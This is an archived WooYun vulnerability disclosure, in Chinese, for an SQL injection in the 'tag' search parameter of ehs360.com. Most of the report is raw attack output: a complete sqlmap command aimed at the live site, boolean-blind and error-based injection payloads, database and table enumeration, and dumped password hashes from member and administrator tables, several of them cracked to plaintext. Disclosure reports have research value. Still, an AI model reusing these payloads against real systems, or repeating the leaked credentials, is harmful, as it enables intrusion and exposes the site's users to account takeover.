乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2016-04-13: 积极联系厂商并且等待厂商认领中,细节不对外公开 2016-05-28: 厂商已经主动忽略漏洞,细节向公众公开
RT
$ python sqlmap.py -u "http://www.ehs360.com/search.php?tag=+%E5%91%BC%E5%90%B8%E5%99%A8" -p tag --technique=BE --output-dir=output --random-agent --batch --no-cast --current-user --is-dba --users --passwords --count --search -C pass
Database: ehs360.com_2010Table: ehse_member[15 entries]+---------------------------------------------+| password |+---------------------------------------------+| 156a1a6f6ea26d3456e7ab65f0e6f86c || 1c88d37be4e1d375f341d906f58288f4 (201314) || 2205e69e7376e166b68f431614c848b1 || 3fc44fddce2f58ec26b3871190982993 (imissyou) || 73d714bd2fd44248f0206b9dce94fdf7 || 7fef5b36f121d34f4e11219f88c9f89a || 8267ddabf72bff6a84ea53db8bc2e8b7 || 887ba5be6381df15715cdc9b15034a67 || 9e0fb72c88ee523675e4f1a25b970d92 || a88edfd5974d1c11c459e0c025a1bc1f || ae47913d58aee2c5941efb7def7b863e || df3192aef281ee9a36a2d43bbd520177 || e10adc3949ba59abbe56e057f20f883e (123456) || e982bbd2514d2e3577282738ea53b002 || eabd8ce9404507aa8c22714d3f5eada9 (aaa111) |+---------------------------------------------+Database: ehs360.com_2010Table: ehse_manage[2 entries]+----------------------------------+| password |+----------------------------------+| 0b955df439d1dc3292aa9d44aa816dfb || 6a4decac41068f5635de848388b54581 |+----------------------------------+Database: ehs360.comTable: ehse_manage[2 entries]+----------------------------------+| password |+----------------------------------+| 0b955df439d1dc3292aa9d44aa816dfb || 6a4decac41068f5635de848388b54581 |+----------------------------------+
---Parameter: tag (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: tag= %E5%91%BC%E5%90%B8%E5%99%A8%' AND 7092=7092 AND '%'=' Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: tag= %E5%91%BC%E5%90%B8%E5%99%A8%' AND (SELECT 4599 FROM(SELECT COUNT(*),CONCAT(0x7171787a71,(SELECT (ELT(4599=4599,1))),0x7178787071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND '%'='---web server operating system: Windowsweb application technology: Apache 2.2.11, PHP 5.2.8back-end DBMS: MySQL 5.0current user: 'ehs360.com@localhost'current user is DBA: Falsedatabase management system users [1]:[*] 'ehs360.com'@'localhost'Database: information_schema+---------------------------------------+---------+| Table | Entries |+---------------------------------------+---------+| COLUMNS | 588 || GLOBAL_STATUS | 291 || SESSION_STATUS | 291 || GLOBAL_VARIABLES | 272 || SESSION_VARIABLES | 272 || COLLATION_CHARACTER_SET_APPLICABILITY | 128 || COLLATIONS | 127 || PARTITIONS | 52 || TABLES | 52 || CHARACTER_SETS | 36 || SCHEMA_PRIVILEGES | 36 || KEY_COLUMN_USAGE | 22 || STATISTICS | 22 || TABLE_CONSTRAINTS | 22 || PLUGINS | 10 || ENGINES | 8 || SCHEMATA | 3 || PROCESSLIST | 1 || USER_PRIVILEGES | 1 |+---------------------------------------+---------+Database: ehs360.com+---------------------------------------+---------+| Table | Entries |+---------------------------------------+---------+| ehse_promodel | 8985 || ehse_attachment | 6690 || ehse_pro | 4904 || ehse_article | 1230 || ehse_protype | 596 || ehse_manage | 2 || ehse_gbook | 1 |+---------------------------------------+---------+Database: ehs360.com_2010+---------------------------------------+---------+| Table | Entries |+---------------------------------------+---------+| ehse_promodel | 8975 || ehse_pro_has_tag | 8482 || ehse_attachment | 6033 || ehse_pro | 4447 || ehse_article | 1203 || ehse_pro0 | 871 || ehse_protype | 544 || ehse_protag | 413 || ehse_gbook | 35 || ehse_inquiry | 21 || ehse_member | 15 || ehse_page | 12 || ehse_config | 11 || ehse_articletype | 2 || ehse_manage | 2 |+---------------------------------------+---------+columns LIKE 'pass' were found in the following databases:Database: ehs360.com_2010Table: ehse_member[1 column]+----------+--------------+| Column | Type |+----------+--------------+| password | varchar(255) |+----------+--------------+Database: ehs360.com_2010Table: ehse_manage[1 column]+----------+-------------+| Column | Type |+----------+-------------+| password | varchar(32) |+----------+-------------+Database: ehs360.comTable: ehse_manage[1 column]+----------+-------------+| Column | Type |+----------+-------------+| password | varchar(32) |+----------+-------------+Database: ehs360.com_2010Table: ehse_member[15 entries]+---------------------------------------------+| password |+---------------------------------------------+| 156a1a6f6ea26d3456e7ab65f0e6f86c || 1c88d37be4e1d375f341d906f58288f4 (201314) || 2205e69e7376e166b68f431614c848b1 || 3fc44fddce2f58ec26b3871190982993 (imissyou) || 73d714bd2fd44248f0206b9dce94fdf7 || 7fef5b36f121d34f4e11219f88c9f89a || 8267ddabf72bff6a84ea53db8bc2e8b7 || 887ba5be6381df15715cdc9b15034a67 || 9e0fb72c88ee523675e4f1a25b970d92 || a88edfd5974d1c11c459e0c025a1bc1f || ae47913d58aee2c5941efb7def7b863e || df3192aef281ee9a36a2d43bbd520177 || e10adc3949ba59abbe56e057f20f883e (123456) || e982bbd2514d2e3577282738ea53b002 || eabd8ce9404507aa8c22714d3f5eada9 (aaa111) |+---------------------------------------------+Database: ehs360.com_2010Table: ehse_manage[2 entries]+----------------------------------+| password |+----------------------------------+| 0b955df439d1dc3292aa9d44aa816dfb || 6a4decac41068f5635de848388b54581 |+----------------------------------+Database: ehs360.comTable: ehse_manage[2 entries]+----------------------------------+| password |+----------------------------------+| 0b955df439d1dc3292aa9d44aa816dfb || 6a4decac41068f5635de848388b54581 |+----------------------------------+
过滤
未能联系到厂商或者厂商积极拒绝
漏洞Rank:15 (WooYun评价)